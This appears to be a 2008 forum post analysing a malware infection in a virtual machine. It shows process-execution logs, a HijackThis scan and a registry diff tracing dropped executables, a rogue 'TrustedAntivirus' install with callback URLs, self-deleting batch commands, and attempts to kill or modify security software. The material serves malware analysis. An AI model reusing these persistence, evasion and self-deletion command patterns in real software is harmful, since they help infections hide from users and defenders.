Thu 06 - 22:46:51 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:46:55 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:46:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:47:01 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:47:04 [EXECUTION] "c:\windows\system32\bv2\renabcom4.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\bv2\renabcom4.exe ]
Thu 06 - 22:47:05 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -embedding ]
Thu 06 - 22:47:09 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1400]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:13 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3932]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:16 [EXECUTION] "c:\windows\17pholmes572.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [1316]
[EXECUTION] Commandline - [ "c:\windows\17pholmes572.exe" 61a847b5bbf728173599284503996897c881250221c8670836ac4fa7c8833201749139 ]
Thu 06 - 22:47:20 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3308]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:26 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3616]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:48:01 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [3368]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:04 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2320]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:06 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3500]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:12 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:48:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3492]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:48:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\cmdinst.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\ev4\philcom3.exe" [3772]
[EXECUTION] Commandline - [ c:\docume~1\kly\locals~1\temp\cmdinst.exe /verysilent ]
Thu 06 - 22:48:25 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [1316]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:48:28 [EXECUTION] "c:\windows\17pholmes1000106.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\fb3\rvdll36.exe" [3736]
[EXECUTION] Commandline - [ "c:\windows\17pholmes1000106.exe" 61a847b5bbf72813329b385772ff01f0b3e35b6638993f4661aa4ebd86d67c56389b284534f310 ]
Thu 06 - 22:48:30 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3508]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:48:40 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [2152]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:48:44 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:48:55 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:48:58 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2800]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:49:05 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\cmdinst.exe" [3080]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" /sl4 $190236 "c:\docume~1\kly\locals~1\temp\cmdinst.exe" 542512 52224 /verysilent ]
Thu 06 - 22:49:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [2152]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:49:19 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [308]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:49:22 [EXECUTION] "c:\docume~1\kly\locals~1\temp\winvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3420]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:25 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:49:28 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\fb3\rvdll36.exe" [3736]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:49:31 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3636]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:49:35 [EXECUTION] "c:\windows\s0xz\command.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" [3392]
[EXECUTION] Commandline - [ "c:\windows\s0xz\command.exe" /install ]
Thu 06 - 22:49:40 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:43 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [308]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:49:45 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:49:47 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3268]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:49:49 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3284]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:49:52 [EXECUTION] "c:\program files\network monitor\netmon.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3392]
[EXECUTION] Commandline - [ "c:\program files\network monitor\netmon.exe" qi ]
Thu 06 - 22:49:54 [EXECUTION] "c:\windows\s0xz\command.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\s0xz\command.exe ]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\virtual machine additions\vmusrvc.exe [368]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\common files\symantec shared\ccapp.exe [428]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\processguard\pgaccount.exe [508]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\processguard\procguard.exe [872]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\ethereal\ethereal.exe [1236]
Thu 06 - 22:49:56 [EXECUTION] "c:\docume~1\kly\locals~1\temp\winvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2180]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:58 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:50:00 [EXECUTION] "c:\program files\network monitor\netmon.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ "c:\program files\network monitor\netmon.exe" service ]
Thu 06 - 22:50:02 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:50:04 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [2904]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:50:11 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [2152]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:50:14 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2780]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 22:50:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:50:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:50:25 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [2244]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:50:28 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2244]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:50:46 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:50:47 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3652]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:51:45 [EXECUTION] "c:\windows\system32\taskmgr.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [572]
[EXECUTION] Commandline - [ taskmgr.exe ]
Thu 06 - 22:54:44 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [2904]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:54:46 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2772]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]

At this point my VM did freeze ...
IPB Image

After reboot ...
QUOTE
---Process Guard Log Started---

Thu 06 - 22:58:43 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [1824]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:58:48 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1956]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 23:01:20 [EXECUTION] "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" was allowed to run
[EXECUTION] Started by "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" [1832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus ]
Thu 06 - 23:01:27 [EXECUTION] "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" [1744]
[EXECUTION] Commandline - [ c:\docume~1\kly\locals~1\temp\~uavsetup.exe /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus /norestart ]
Thu 06 - 23:01:29 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" [1228]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" /sl4 $60136 "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" 15424389 52224 /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus /norestart ]
Thu 06 - 23:01:33 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\gfl.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\gfl.exe" /inireplace ga6plicense.ini ]
Thu 06 - 23:01:40 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\xmlreplacer.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\xmlreplacer.exe" "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\winav.xml" "[name]" "trustedantivirus" ]
Thu 06 - 23:01:52 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im pgs.exe ]
Thu 06 - 23:01:55 [EXECUTION] "c:\windows\system32\wbem\wmiprvse.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [784]
[EXECUTION] Commandline - [ c:\windows\system32\wbem\wmiprvse.exe -embedding ]
Thu 06 - 23:01:58 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im fwsvc.exe ]
Thu 06 - 23:02:02 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im uga6pcw.exe ]
Thu 06 - 23:02:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:17 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:26 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "rundll32.exe" "c:\program files\trustedantivirus\dhlp.dll" _install@16 ]
Thu 06 - 23:02:29 [EXECUTION] "c:\program files\trustedantivirus\activate.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\activate.exe" /"trustedantivirus" ]
Thu 06 - 23:02:31 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /insthelp blpatch trustedantivirus hxxp://trustedantivirus.com/ "c:\program files\trustedantivirus\dat\bnlink.dat" ]
Thu 06 - 23:02:32 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /insthelp sr ?action=23&abbr=uga6p_{pcid}_362.2&pc_id={computer_id}&gai={gai}&gli={gli}&gff={gff}&cnt={cnt}&lng={lng}&lp={lp}&addt={addt} hxxp://ykeeper.trustedantivirus.com/ hxxp://trustedantivirus.com/ trustedantivirus ]
Thu 06 - 23:02:34 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -domain hxxp://trustedantivirus.com ]
Thu 06 - 23:02:36 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -install ]
Thu 06 - 23:02:37 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -start ]
Thu 06 - 23:02:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "rundll32.exe" "c:\program files\trustedantivirus\dhlp.dll" _install@16 ]
Thu 06 - 23:02:42 [EXECUTION] "c:\program files\common files\trustedantivirus\bm.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\bm.exe" dm=hxxp://trustedantivirus.com ad=hxxp://trustedantivirus.com sd=hxxp://ykeeper.trustedantivirus.com ]
Thu 06 - 23:02:44 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /quickscan ]
Thu 06 - 23:02:56 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [1824]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 23:02:58 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1240]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 23:03:06 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [784]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -embedding ]

In addition to the pile of crap, an antivirus for which I didn't even ask as a prime ... Detects a part of what the infection did install of course.
IPB Image
IPB Image
IPB Image
QUOTE
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:37:58 PM, on 3/6/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\S0xZ\command.exe
C:\WINDOWS\mrofinu1000106.exe
C:\Program Files\Network Monitor\netmon.exe
C:\Program Files\Common Files\TrustedAntivirus\ugac.exe
C:\Program Files\Common Files\TrustedAntivirus\bm.exe
C:\Program Files\TrustedAntivirus\pgs.exe

O2 - BHO: (no name) - {0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD} - C:\Program Files\Internet Explorer\xabe89104.dll
O2 - BHO: (no name) - {22342B44-5B98-4B30-9D53-C182AD8DF217} - C:\WINDOWS\system32\fccbbya.dll
O2 - BHO: CIEIntegrator Object - {5C3F6257-3E00-45C2-88D5-CB0F3A17BF0E} - C:\Program Files\TrustedAntivirus\Tools\pblock.dll
O2 - BHO: IEFW Object - {6F87F145-DC2D-4766-AF03-3A3B96FFAD98} - C:\Program Files\TrustedAntivirus\Tools\sbiebho.dll
O4 - HKLM\..\Run: [runner1] C:\WINDOWS\mrofinu1000106.exe 61A847B5BBF72813329B385772FF01F0B3E35B6638993F4661AA4EBD86D67C56389B284534F310
O4 - HKLM\..\Run: [TrustedAntivirus] C:\Program Files\TrustedAntivirus\pgs.exe
O4 - HKLM\..\Run: [ugac] "C:\PROGRA~1\COMMON~1\TRUSTE~1\ugac.exe" -start
O4 - HKLM\..\Run: [bm] "C:\Program Files\Common Files\TrustedAntivirus\bm.exe" dm=http://trustedantivirus.com ad=http://trustedantivirus.com sd=http://ykeeper.trustedantivirus.com
O4 - HKLM\..\Run: [ptask] C:\Program Files\TrustedAntivirus\ptask.exe
O4 - HKLM\..\RunOnce: [overinstall] "C:\Program Files\TrustedAntivirus\pgs.exe" /empty
O4 - Startup: DW_Start.lnk = ?
O20 - Winlogon Notify: fccbbya - C:\WINDOWS\SYSTEM32\fccbbya.dll
O23 - Service: Command Service (cmdService) - Unknown owner - C:\WINDOWS\S0xZ\command.exe
O23 - Service: Network Monitor - Unknown owner - C:\Program Files\Network Monitor\netmon.exe
--
End of file - 5143 bytes
Note: I left out all legit entries.
Kimberly
Mar 6 2008, 11:47 PM
Registry.

QUOTE
Keys ignored: 0
---------------
* (none)

Keys added:
---------------
HKEY_CURRENT_USER\Software\Microsoft\Installer
HKEY_CURRENT_USER\Software\Microsoft\Windows Script
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings
HKEY_CURRENT_USER\Software\mozilla.org
HKEY_CURRENT_USER\Software\mozilla.org\Mozilla
HKEY_CURRENT_USER\Software\Opera Software
HKEY_CURRENT_USER\Software\TrustedAntivirus
HKEY_CURRENT_USER\Software\TrustedAntivirus\Settings
HKEY_CLASSES_ROOT\AppID\{EA7522F6-87CF-411e-8A55-19EE4344B676}
HKEY_CLASSES_ROOT\AppID\pblock.DLL
HKEY_CLASSES_ROOT\CLSID\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}
HKEY_CLASSES_ROOT\CLSID\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}\InProcServer32
HKEY_CLASSES_ROOT\CLSID\{22342B44-5B98-4B30-9D53-C182AD8DF217}
HKEY_CLASSES_ROOT\CLSID\{22342B44-5B98-4B30-9D53-C182AD8DF217}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Control
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}
